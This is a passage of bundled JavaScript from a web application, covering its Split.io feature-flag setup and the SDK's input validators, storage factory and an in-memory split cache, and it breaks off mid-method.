/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(1270);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_app_action_types_js__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__splitsoftware_splitio__ = __webpack_require__(1271);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_profile_getters_js__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils__ = __webpack_require__(2891);






var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:features:epics'); // eslint-disable-line no-unused-vars











// Since we initialize split in an async way we use a subject to reference it.
// This subject should in practice only emit one single value--the split
// instance.
var flagList = Object(__WEBPACK_IMPORTED_MODULE_10__utils__["a" /* makeFlagList */])();
var split$ = new __WEBPACK_IMPORTED_MODULE_0_rxjs__["ReplaySubject"](1);

var wrapSplit = function wrapSplit(split) {
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].create(function (obs) {
    split.on(split.SDK_READY, function () {
      return obs.next({ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["b" /* SPLIT_SDK_READY */] });
    });
    split.on(split.SDK_READY_TIMED_OUT, function () {
      return obs.next({ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["c" /* SPLIT_SDK_READY_TIMED_OUT */] });
    });
    split.on(split.SDK_UPDATE, function () {
      return obs.next({ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* SPLIT_SDK_UPDATE */] });
    });

    return function () {
      return split.destroy();
    };
  });
};

/**
 * Initialize our split client instance.
 *
 * NOTE: The distinct call should make sure that even if the profile is fetched
 * multiple times it will not instantiate multiple split instances
 */
var initializeSplitEpic = function initializeSplitEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8_modules_profile_action_types_js__["f" /* FETCH_SUCCESS */], __WEBPACK_IMPORTED_MODULE_8_modules_profile_action_types_js__["q" /* UPDATE_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_7_ramda__["pathOr"])(null, ['payload', 'email'])).filter(Boolean) // Make sure we actually get guids
  .distinct() // See NOTE
  .map(__WEBPACK_IMPORTED_MODULE_10__utils__["b" /* makeSplitClient */]).do(split$) // Initialize split
  .mergeMap(wrapSplit);
};

var fetchLatestTreatmentsEpic = function fetchLatestTreatmentsEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["b" /* SPLIT_SDK_READY */], __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* SPLIT_SDK_UPDATE */]).combineLatest(split$).map(function (combinedActions) {
    return combinedActions[1];
  }).map(function (split) {
    var profile = __WEBPACK_IMPORTED_MODULE_9_modules_profile_getters_js__["profile"](store.getState());
    var x = {
      guid: profile.get('guid'),
      email: profile.get('email'),
      firstName: profile.get('firstName'),
      lastName: profile.get('lastName'),
      enclaveInboxLimit: profile.getIn(['company', 'maxIngestEmailsCount']),
      trialCompany: profile.getIn(['company', 'trialCompany']),
      companyGuid: profile.getIn(['company', 'guid']),
      companyName: profile.getIn(['company', 'name'])
    };
    return split.getTreatmentsWithConfig(flagList, x);
  }).map(function (features) {
    return {
      type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* FEATURES_UPDATED */],
      payload: features
    };
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(initializeSplitEpic, fetchLatestTreatmentsEpic));

/***/ }),
/* 2753 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__ = __webpack_require__(202);





var collectTreatments = function collectTreatments(splitObject) {
  var conditions = splitObject.conditions; // Rollout conditions are supposed to have the entire partitions list, so we find the first one.

  var allTreatmentsCondition = Object(__WEBPACK_IMPORTED_MODULE_2__utils_lang__["b" /* find */])(conditions, function (cond) {
    return cond.conditionType === 'ROLLOUT';
  }); // Localstorage mode could fall into a no rollout conditions state. Take the first condition in that case.

  if (!allTreatmentsCondition) allTreatmentsCondition = conditions[0]; // Then extract the treatments from the partitions

  return allTreatmentsCondition ? allTreatmentsCondition.partitions.map(function (v) {
    return v.treatment;
  }) : [];
};

var ObjectToView = function ObjectToView(json) {
  var splitObject;

  try {
    splitObject = JSON.parse(json);
  } catch (e) {
    return null;
  }

  if (splitObject == null) return null;
  return {
    name: splitObject.name,
    trafficType: splitObject.trafficTypeName || null,
    killed: splitObject.killed,
    changeNumber: splitObject.changeNumber || 0,
    treatments: collectTreatments(splitObject),
    configs: splitObject.configurations || {}
  };
};

var ObjectsToViews = function ObjectsToViews(jsons) {
  var views = [];
  jsons.forEach(function (split) {
    var view = ObjectToView(split);
    if (view != null) views.push(view);
  });
  return views;
};

function SplitManagerFactory(_splits, context) {
  var SPLIT_FN_LABEL = 'split';
  var statusManager = context.get(context.constants.STATUS_MANAGER);
  return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()( // Proto-linkage of the readiness Event Emitter
  Object.create(statusManager), {
    /**
     * Get the Split object corresponding to the given split name if valid
     */
    split: function split(maybeSplitName) {
      var splitName = Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["j" /* validateSplit */])(maybeSplitName, SPLIT_FN_LABEL);

      if (!Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["g" /* validateIfDestroyed */])(context) || !Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["h" /* validateIfReady */])(context, SPLIT_FN_LABEL) || !splitName) {
        return null;
      }

      var split = _splits.getSplit(splitName);

      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(split)) {
        return split.then(function (result) {
          Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["k" /* validateSplitExistance */])(context, splitName, result, SPLIT_FN_LABEL);
          return ObjectToView(result);
        });
      }

      Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["k" /* validateSplitExistance */])(context, splitName, split, SPLIT_FN_LABEL);
      return ObjectToView(split);
    },

    /**
     * Get the Split objects present on the factory storage
     */
    splits: function splits() {
      if (!Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["g" /* validateIfDestroyed */])(context) || !Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["h" /* validateIfReady */])(context, 'splits')) {
        return [];
      }

      var currentSplits = _splits.getAll();

      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(currentSplits)) return currentSplits.then(ObjectsToViews);
      return ObjectsToViews(currentSplits);
    },

    /**
     * Get the Split names present on the factory storage
     */
    names: function names() {
      if (!Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["g" /* validateIfDestroyed */])(context) || !Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["h" /* validateIfReady */])(context, 'names')) {
        return [];
      }

      return _splits.getKeys();
    }
  });
}

/* harmony default export */ __webpack_exports__["a"] = (SplitManagerFactory);

/***/ }),
/* 2754 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["b"] = validateApiKey;
/* harmony export (immutable) */ __webpack_exports__["a"] = releaseApiKey;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('', {
  displayAllErrors: true
});
var usedKeysMap = {};
function validateApiKey(maybeApiKey) {
  var apiKey = false;

  if (maybeApiKey == undefined) {
    // eslint-disable-line eqeqeq
    log.error('Factory instantiation: you passed a null or undefined api_key, api_key must be a non-empty string.');
  } else if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(maybeApiKey)) {
    if (maybeApiKey.length > 0) apiKey = maybeApiKey;else log.error('Factory instantiation: you passed an empty api_key, api_key must be a non-empty string.');
  } else {
    log.error('Factory instantiation: you passed an invalid api_key, api_key must be a non-empty string.');
  } // If the apiKey is correct, we'll save it as the instance creation should work.


  if (apiKey) {
    if (!usedKeysMap[apiKey]) {
      // If this key is not present, only warning scenarios is that we have factories for other keys.
      usedKeysMap[apiKey] = 1;

      if (Object.keys(usedKeysMap).length > 1) {
        log.warn('Factory instantiation: You already have an instance of the Split factory. Make sure you definitely want this additional instance. We recommend keeping only one instance of the factory at all times (Singleton pattern) and reusing it throughout your application.');
      }
    } else {
      log.warn("Factory instantiation: You already have " + usedKeysMap[apiKey] + " " + (usedKeysMap[apiKey] === 1 ? 'factory' : 'factories') + " with this API Key. We recommend keeping only one instance of the factory at all times (Singleton pattern) and reusing it throughout your application.");
      usedKeysMap[apiKey]++;
    }
  }

  return apiKey;
}
function releaseApiKey(apiKey) {
  if (usedKeysMap[apiKey]) usedKeysMap[apiKey]--;
  if (usedKeysMap[apiKey] === 0) delete usedKeysMap[apiKey];
}

/***/ }),
/* 2755 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateAttributes;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
function validateAttributes(maybeAttrs, method) {
  // Attributes are optional
  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["i" /* isObject */])(maybeAttrs) || maybeAttrs == undefined) // eslint-disable-line eqeqeq
    return maybeAttrs;
  log.error(method + ": attributes must be a plain object.");
  return false;
}

/***/ }),
/* 2756 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateEvent;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
var EVENT_TYPE_REGEX = /^[a-zA-Z0-9][-_.:a-zA-Z0-9]{0,79}$/;
function validateEvent(maybeEvent, method) {
  if (maybeEvent == undefined) {
    // eslint-disable-line eqeqeq
    log.error(method + ": you passed a null or undefined event_type, event_type must be a non-empty string.");
  } else if (!Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(maybeEvent)) {
    log.error(method + ": you passed an invalid event_type, event_type must be a non-empty string.");
  } else {
    // It is a string.
    if (maybeEvent.length === 0) {
      log.error(method + ": you passed an empty event_type, event_type must be a non-empty string.");
    } else if (!EVENT_TYPE_REGEX.test(maybeEvent)) {
      log.error(method + ": you passed \"" + maybeEvent + "\", event_type must adhere to the regular expression /^[a-zA-Z0-9][-_.:a-zA-Z0-9]{0,79}$/g. This means an event_type must be alphanumeric, cannot be more than 80 characters long, and can only include a dash, underscore, period, or colon as separators of alphanumeric characters.");
    } else {
      return maybeEvent;
    }
  }

  return false;
}

/***/ }),
/* 2757 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateEventValue;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
function validateEventValue(maybeValue, method) {
  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["l" /* numberIsFinite */])(maybeValue) || maybeValue == undefined) // eslint-disable-line eqeqeq
    return maybeValue;
  log.error(method + ": value must be a finite number.");
  return false;
}

/***/ }),
/* 2758 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateEventProperties;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
var ECMA_SIZES = {
  NULL: 0,
  // While on the JSON it's going to occupy more space, we'll take it as 0 for the approximation.
  STRING: 2,
  BOOLEAN: 4,
  NUMBER: 8
};
var MAX_PROPERTIES_AMOUNT = 300;
var MAX_PROPERTIES_SIZE = 1024 * 32;
var BASE_EVENT_SIZE = 1024; // We assume 1kb events without properties (avg measured)

function validateEventProperties(maybeProperties, method) {
  if (maybeProperties == undefined) return {
    properties: null,
    size: BASE_EVENT_SIZE
  }; // eslint-disable-line eqeqeq

  if (!Object(__WEBPACK_IMPORTED_MODULE_0__lang__["i" /* isObject */])(maybeProperties)) {
    log.error(method + ": properties must be a plain object.");
    return {
      properties: false,
      size: BASE_EVENT_SIZE
    };
  }

  var keys = Object.keys(maybeProperties);
  var clone = Object(__WEBPACK_IMPORTED_MODULE_0__lang__["n" /* shallowClone */])(maybeProperties); // To avoid calculating the size twice we'll return it from here.

  var output = {
    properties: clone,
    size: BASE_EVENT_SIZE // We assume 1kb events without properties (avg measured)

  };

  if (keys.length > MAX_PROPERTIES_AMOUNT) {
    log.warn(method + ": Event has more than 300 properties. Some of them will be trimmed when processed.");
  }

  for (var i = 0; i < keys.length; i++) {
    output.size += keys[i].length * ECMA_SIZES.STRING; // Count the size of the key which is always a string.

    var val = clone[keys[i]];
    var isStringVal = Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(val);
    var isFiniteVal = Object(__WEBPACK_IMPORTED_MODULE_0__lang__["l" /* numberIsFinite */])(val);
    var isBoolVal = Object(__WEBPACK_IMPORTED_MODULE_0__lang__["h" /* isBoolean */])(val);
    var isNullVal = val === null;

    if (!(isStringVal || isFiniteVal || isBoolVal || isNullVal)) {
      // If it's not of valid type.
      clone[keys[i]] = null;
      val = null;
      isNullVal = true;
      log.warn(method + ": Property " + keys[i] + " is of invalid type. Setting value to null.");
    }

    if (isNullVal) output.size += ECMA_SIZES.NULL;else if (isFiniteVal) output.size += ECMA_SIZES.NUMBER;else if (isBoolVal) output.size += ECMA_SIZES.BOOLEAN;else if (isStringVal) output.size += val.length * ECMA_SIZES.STRING;

    if (output.size > MAX_PROPERTIES_SIZE) {
      log.error(method + ": The maximum size allowed for the properties is 32768 bytes, which was exceeded. Event not queued.");
      output.properties = false;
      break;
    }
  }

  return output;
}

/***/ }),
/* 2759 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateKey;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
var KEY_MAX_LENGTH = 250;

function validateKeyValue(maybeKey, method, type) {
  if (maybeKey == undefined) {
    // eslint-disable-line eqeqeq
    log.error(method + ": you passed a null or undefined " + type + ", " + type + " must be a non-empty string.");
    return false;
  }

  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["l" /* numberIsFinite */])(maybeKey)) {
    log.warn(method + ": " + type + " \"" + maybeKey + "\" is not of type string, converting.");
    return Object(__WEBPACK_IMPORTED_MODULE_0__lang__["q" /* toString */])(maybeKey);
  }

  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(maybeKey)) {
    // It's a string, start by trimming the value.
    maybeKey = maybeKey.trim(); // It's aaaaaall good.

    if (maybeKey.length > 0 && maybeKey.length <= KEY_MAX_LENGTH) return maybeKey;

    if (maybeKey.length === 0) {
      log.error(method + ": you passed an empty string, " + type + " must be a non-empty string.");
    } else if (maybeKey.length > KEY_MAX_LENGTH) {
      log.error(method + ": " + type + " too long, " + type + " must be 250 characters or less.");
    }
  } else {
    log.error(method + ": you passed an invalid " + type + " type, " + type + " must be a non-empty string.");
  }

  return false;
}

function validateKey(maybeKey, method) {
  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["i" /* isObject */])(maybeKey)) {
    // Validate key object
    var matchingKey = validateKeyValue(maybeKey.matchingKey, method, 'matchingKey');
    var bucketingKey = validateKeyValue(maybeKey.bucketingKey, method, 'bucketingKey');
    if (matchingKey && bucketingKey) return {
      matchingKey: matchingKey,
      bucketingKey: bucketingKey
    };
    log.error(method + ": Key must be an object with bucketingKey and matchingKey with valid string properties.");
    return false;
  } else {
    return validateKeyValue(maybeKey, method, 'key');
  }
}

/***/ }),
/* 2760 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateTrafficType;
/* harmony export (immutable) */ __webpack_exports__["b"] = validateTrafficTypeExistance;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__logger__ = __webpack_require__(9);




var log = Object(__WEBPACK_IMPORTED_MODULE_3__logger__["b" /* default */])('');
var CAPITAL_LETTERS_REGEX = /[A-Z]/;
function validateTrafficType(maybeTT, method) {
  if (maybeTT == undefined) {
    // eslint-disable-line eqeqeq
    log.error(method + ": you passed a null or undefined traffic_type_name, traffic_type_name must be a non-empty string.");
  } else if (!Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(maybeTT)) {
    log.error(method + ": you passed an invalid traffic_type_name, traffic_type_name must be a non-empty string.");
  } else {
    if (maybeTT.length === 0) {
      log.error(method + ": you passed an empty traffic_type_name, traffic_type_name must be a non-empty string.");
    } else {
      if (CAPITAL_LETTERS_REGEX.test(maybeTT)) {
        log.warn(method + ": traffic_type_name should be all lowercase - converting string to lowercase.");
        maybeTT = maybeTT.toLowerCase();
      }

      return maybeTT;
    }
  }

  return false;
}

function logTTExistanceWarning(method, ttName) {
  log.warn(method + ": Traffic Type " + ttName + " does not have any corresponding Splits in this environment, make sure you're tracking your events to a valid traffic type defined in the Split console.");
}
/**
 * Separated from the previous method since on some cases it'll be async.
 */


function validateTrafficTypeExistance(maybeTT, context, method) {
  var isReady = context.get(context.constants.READY, true);
  var settings = context.get(context.constants.SETTINGS);
  var splitsStorage = context.get(context.constants.STORAGE).splits; // If not ready or in localhost mode, we won't run the validation

  if (!isReady || settings.mode === __WEBPACK_IMPORTED_MODULE_2__constants__["g" /* LOCALHOST_MODE */]) return true;
  var res = splitsStorage.trafficTypeExists(maybeTT);

  if (Object(__WEBPACK_IMPORTED_MODULE_1__promise_thenable__["a" /* default */])(res)) {
    res.then(function (isValid) {
      if (!isValid) logTTExistanceWarning(method, maybeTT);
      return isValid; // propagate result
    });
  } else {
    if (!res) logTTExistanceWarning(method, maybeTT);
  }

  return res;
}

/***/ }),
/* 2761 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateIfDestroyed;
/* harmony export (immutable) */ __webpack_exports__["b"] = validateIfReady;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__logger__ = __webpack_require__(9);

var log = Object(__WEBPACK_IMPORTED_MODULE_0__logger__["b" /* default */])('', {
  displayAllErrors: true
});
function validateIfDestroyed(context) {
  if (!context.get(context.constants.DESTROYED, true)) return true;
  log.error('Client has already been destroyed - no calls possible.');
  return false;
}
function validateIfReady(context, method) {
  if (context.get(context.constants.READY, true) || context.get(context.constants.READY_FROM_CACHE, true)) return true;
  log.warn(method + ": the SDK is not ready, results may be incorrect. Make sure to wait for SDK readiness before using this method.");
  return false;
}

/***/ }),
/* 2762 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export DEFAULT_CACHE_EXPIRATION_IN_MILLIS */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__SplitCache_InMemory__ = __webpack_require__(2763);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__SplitCache_InLocalStorage__ = __webpack_require__(2764);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__SegmentCache_InMemory__ = __webpack_require__(2765);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__SegmentCache_InLocalStorage__ = __webpack_require__(2766);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ImpressionsCache_InMemory__ = __webpack_require__(2767);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__LatencyCache_InMemory__ = __webpack_require__(2768);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__CountCache_InMemory__ = __webpack_require__(2771);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__EventsCache_InMemory__ = __webpack_require__(2772);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__Keys__ = __webpack_require__(1278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__KeysLocalStorage__ = __webpack_require__(2773);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils_constants__ = __webpack_require__(56);










 // This value might be eventually set via a config parameter

var DEFAULT_CACHE_EXPIRATION_IN_MILLIS = 864000000; // 10 days

var BrowserStorageFactory = function BrowserStorageFactory(context) {
  var settings = context.get(context.constants.SETTINGS);
  var storage = settings.storage;

  switch (storage.type) {
    case __WEBPACK_IMPORTED_MODULE_10__utils_constants__["o" /* STORAGE_MEMORY */]:
      {
        var keys = new __WEBPACK_IMPORTED_MODULE_8__Keys__["a" /* default */](settings);
        return {
          splits: new __WEBPACK_IMPORTED_MODULE_0__SplitCache_InMemory__["a" /* default */](),
          segments: new __WEBPACK_IMPORTED_MODULE_2__SegmentCache_InMemory__["a" /* default */](keys),
          impressions: new __WEBPACK_IMPORTED_MODULE_4__ImpressionsCache_InMemory__["a" /* default */](),
          metrics: new __WEBPACK_IMPORTED_MODULE_5__LatencyCache_InMemory__["a" /* default */](),
          count: new __WEBPACK_IMPORTED_MODULE_6__CountCache_InMemory__["a" /* default */](),
          events: new __WEBPACK_IMPORTED_MODULE_7__EventsCache_InMemory__["a" /* default */](context),
          // When using shared instanciation with MEMORY we reuse everything but segments (they are customer per key).
          shared: function shared(settings) {
            var childKeyBuilder = new __WEBPACK_IMPORTED_MODULE_8__Keys__["a" /* default */](settings);
            return {
              splits: this.splits,
              segments: new __WEBPACK_IMPORTED_MODULE_2__SegmentCache_InMemory__["a" /* default */](childKeyBuilder),
              impressions: this.impressions,
              metrics: this.metrics,
              count: this.count,
              events: this.events,
              destroy: function destroy() {
                this.splits = new __WEBPACK_IMPORTED_MODULE_0__SplitCache_InMemory__["a" /* default */]();
                this.segments.flush();
              }
            };
          },
          destroy: function destroy() {
            this.splits.flush();
            this.segments.flush();
            this.impressions.clear();
            this.metrics.clear();
            this.count.clear();
            this.events.clear();
          }
        };
      }

    case __WEBPACK_IMPORTED_MODULE_10__utils_constants__["n" /* STORAGE_LOCALSTORAGE */]:
      {
        var _keys = new __WEBPACK_IMPORTED_MODULE_9__KeysLocalStorage__["a" /* default */](settings);

        var expirationTimestamp = Date.now() - DEFAULT_CACHE_EXPIRATION_IN_MILLIS;
        return {
          splits: new __WEBPACK_IMPORTED_MODULE_1__SplitCache_InLocalStorage__["a" /* default */](_keys, expirationTimestamp, settings.sync.__splitFiltersValidation),
          segments: new __WEBPACK_IMPORTED_MODULE_3__SegmentCache_InLocalStorage__["a" /* default */](_keys),
          impressions: new __WEBPACK_IMPORTED_MODULE_4__ImpressionsCache_InMemory__["a" /* default */](),
          metrics: new __WEBPACK_IMPORTED_MODULE_5__LatencyCache_InMemory__["a" /* default */](),
          count: new __WEBPACK_IMPORTED_MODULE_6__CountCache_InMemory__["a" /* default */](),
          events: new __WEBPACK_IMPORTED_MODULE_7__EventsCache_InMemory__["a" /* default */](context),
          // When using shared instanciation with MEMORY we reuse everything but segments (they are customer per key).
          shared: function shared(settings) {
            var childKeysBuilder = new __WEBPACK_IMPORTED_MODULE_9__KeysLocalStorage__["a" /* default */](settings);
            return {
              splits: this.splits,
              segments: new __WEBPACK_IMPORTED_MODULE_3__SegmentCache_InLocalStorage__["a" /* default */](childKeysBuilder),
              impressions: this.impressions,
              metrics: this.metrics,
              count: this.count,
              events: this.events,
              destroy: function destroy() {
                this.splits = new __WEBPACK_IMPORTED_MODULE_0__SplitCache_InMemory__["a" /* default */]();
                this.segments = new __WEBPACK_IMPORTED_MODULE_2__SegmentCache_InMemory__["a" /* default */](childKeysBuilder);
              }
            };
          },
          destroy: function destroy() {
            this.splits = new __WEBPACK_IMPORTED_MODULE_0__SplitCache_InMemory__["a" /* default */]();
            this.segments = new __WEBPACK_IMPORTED_MODULE_2__SegmentCache_InMemory__["a" /* default */](new __WEBPACK_IMPORTED_MODULE_8__Keys__["a" /* default */](settings));
            this.impressions.clear();
            this.metrics.clear();
            this.count.clear();
            this.events.clear();
          }
        };
      }

    default:
      throw new Error('Unsupported storage type');
  }
};

/* harmony default export */ __webpack_exports__["a"] = (BrowserStorageFactory);

/***/ }),
/* 2763 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__ = __webpack_require__(1276);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__killLocally__ = __webpack_require__(1277);




var SplitCacheInMemory = /*#__PURE__*/function () {
  function SplitCacheInMemory() {
    this.flush();
  }

  var _proto = SplitCacheInMemory.prototype;

  _proto.addSplit = function addSplit(splitName, split) {
    var splitFromMemory = this.getSplit(splitName);

    if (splitFromMemory) {
      // We had this Split already
      var previousSplit = JSON.parse(splitFromMemory);

      if (previousSplit.trafficTypeName) {
        var previousTtName = previousSplit.trafficTypeName;
        this.ttCache[previousTtName]--;
        if (!this.ttCache[previousTtName]) delete this.ttCache[previousTtName];
      }

      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__["a" /* default */])(previousSplit.conditions)) {
        // Substract from segments count for the previous version of this Split.
        this.splitsWithSegmentsCount--;
      }
    }

    var parsedSplit = JSON.parse(split);

    if (parsedSplit) {
      // Store the Split.
      this.splitCache[splitName] = split; // Update TT cache

      var ttName = parsedSplit.trafficTypeName;

      if (ttName) {
        // safeguard
        if (!this.ttCache[ttName]) this.ttCache[ttName] = 0;
        this.ttCache[ttName]++;
      } // Add to segments count for the new version of the Split


      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__["a" /* default */])(parsedSplit.conditions)) this.splitsWithSegmentsCount++;
      return true;
    } else {
      return false;
    }
  };

  _proto.addSplits = function addSplits(entries) {
    var _this = this;

    var results = [];
    entries.forEach(function (keyValuePair) {
      results.push(_this.addSplit(keyValuePair[0], keyValuePair[1]));
    });
    return results;
  };

  _proto.removeSplit = function removeSplit(splitName) {
    var split = this.getSplit(splitName);

    if (split) {
      // Delete the Split
      delete this.splitCache[splitName];
      var parsedSplit = JSON.parse(split);
      var ttName = parsedSplit.trafficTypeName;

      if (ttName) {
        // safeguard
        this.ttCache[ttName]--; // Update tt cache

        if (!this.ttCache[ttName]) delete this.ttCache[ttName];
      } // Update the segments count.


      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__["a" /* default */])(parsedSplit.conditions)) this.splitsWithSegmentsCount--;
      return 1;
    } else {
      return 0;
    }
  };

  _proto.removeSplits = function removeSplits(splitNames) {
    var _this2 = this;

    splitNames.forEach(function (n) {
      return _this2.removeSplit(n);
    });
    return splitNames.length;
  };

  _proto.getSplit = function getSplit(splitName) {
    return this.splitCache[splitName];
  };

  _proto.setChangeNumber = function setChangeNumber(changeNumber) {
    this.changeNumber = changeNumber;
    return true;
  };

  _proto.getChangeNumber = function getChangeNumber() {
